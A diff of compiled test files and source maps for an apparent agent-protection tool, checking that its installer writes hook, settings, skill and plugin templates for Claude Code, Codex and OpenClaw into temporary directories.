@@ -0,0 +1 @@
1
+ {"version":3,"file":"installer.test.d.ts","sourceRoot":"","sources":["../../src/tests/installer.test.ts"],"names":[],"mappings":""}
@@ -0,0 +1,32 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const node_test_1 = require("node:test");
7
+ const strict_1 = __importDefault(require("node:assert/strict"));
8
+ const node_fs_1 = require("node:fs");
9
+ const node_path_1 = require("node:path");
10
+ const node_os_1 = require("node:os");
11
+ const installers_js_1 = require("../installers.js");
12
+ (0, node_test_1.describe)('Agent template installers', () => {
13
+ (0, node_test_1.it)('writes Claude Code hook and settings templates', () => {
14
+ const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-claude-'));
15
+ const result = (0, installers_js_1.installAgentTemplates)('claude-code', { cwd: dir });
16
+ strict_1.default.equal(result.files.length, 2);
17
+ strict_1.default.ok((0, node_fs_1.existsSync)((0, node_path_1.join)(dir, '.claude', 'hooks', 'agentguard-protect.sh')));
18
+ strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, '.claude', 'settings.local.json'), 'utf8').includes('agentguard-protect.sh'));
19
+ });
20
+ (0, node_test_1.it)('writes Codex skill and hook templates', () => {
21
+ const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-codex-'));
22
+ (0, installers_js_1.installAgentTemplates)('codex', { cwd: dir });
23
+ strict_1.default.ok((0, node_fs_1.existsSync)((0, node_path_1.join)(dir, '.codex', 'skills', 'agentguard', 'SKILL.md')));
24
+ strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, '.codex', 'agentguard-hook.example.json'), 'utf8').includes('AGENTGUARD_AGENT_HOST=codex'));
25
+ });
26
+ (0, node_test_1.it)('writes OpenClaw plugin template', () => {
27
+ const dir = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-openclaw-'));
28
+ (0, installers_js_1.installAgentTemplates)('openclaw', { cwd: dir });
29
+ strict_1.default.ok((0, node_fs_1.readFileSync)((0, node_path_1.join)(dir, 'openclaw.agentguard.plugin.ts'), 'utf8').includes('registerOpenClawPlugin'));
30
+ });
31
+ });
32
+ //# sourceMappingURL=installer.test.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"installer.test.js","sourceRoot":"","sources":["../../src/tests/installer.test.ts"],"names":[],"mappings":";;;;;AAAA,yCAAyC;AACzC,gEAAwC;AACxC,qCAAgE;AAChE,yCAAiC;AACjC,qCAAiC;AACjC,oDAAyD;AAEzD,IAAA,oBAAQ,EAAC,2BAA2B,EAAE,GAAG,EAAE;IACzC,IAAA,cAAE,EAAC,gDAAgD,EAAE,GAAG,EAAE;QACxD,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,oBAAoB,CAAC,CAAC,CAAC;QAC9D,MAAM,MAAM,GAAG,IAAA,qCAAqB,EAAC,aAAa,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAElE,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,KAAK,CAAC,MAAM,EAAE,CAAC,CAAC,CAAC;QACrC,gBAAM,CAAC,EAAE,CAAC,IAAA,oBAAU,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,SAAS,EAAE,OAAO,EAAE,uBAAuB,CAAC,CAAC,CAAC,CAAC;QAC9E,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,SAAS,EAAE,qBAAqB,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,uBAAuB,CAAC,CAAC,CAAC;IACjH,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,uCAAuC,EAAE,GAAG,EAAE;QAC/C,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,mBAAmB,CAAC,CAAC,CAAC;QAC7D,IAAA,qCAAqB,EAAC,OAAO,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAE7C,gBAAM,CAAC,EAAE,CAAC,IAAA,oBAAU,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,QAAQ,EAAE,QAAQ,EAAE,YAAY,EAAE,UAAU,CAAC,CAAC,CAAC,CAAC;QAC/E,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,QAAQ,EAAE,8BAA8B,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,6BAA6B,CAAC,CAAC,CAAC;IAC/H,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,iCAAiC,EAAE,GAAG,EAAE;QACzC,MAAM,GAAG,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,sBAAsB,CAAC,CAAC,CAAC;QAChE,IAAA,qCAAqB,EAAC,UAAU,EAAE,EAAE,GAAG,EAAE,GAAG,EAAE,CAAC,CAAC;QAEhD,gBAAM,CAAC,EAAE,CAAC,IAAA,sBAAY,EAAC,IAAA,gBAAI,EAAC,GAAG,EAAE,+BAA+B,CAAC,EAAE,MAAM,CAAC,CAAC,QAAQ,CAAC,wBAAwB,CAAC,CAAC,CAAC;IACjH,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
@@ -0,0 +1,2 @@
1
+ export {};
2
+ //# sourceMappingURL=runtime-cloud.test.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"runtime-cloud.test.d.ts","sourceRoot":"","sources":["../../src/tests/runtime-cloud.test.ts"],"names":[],"mappings":""}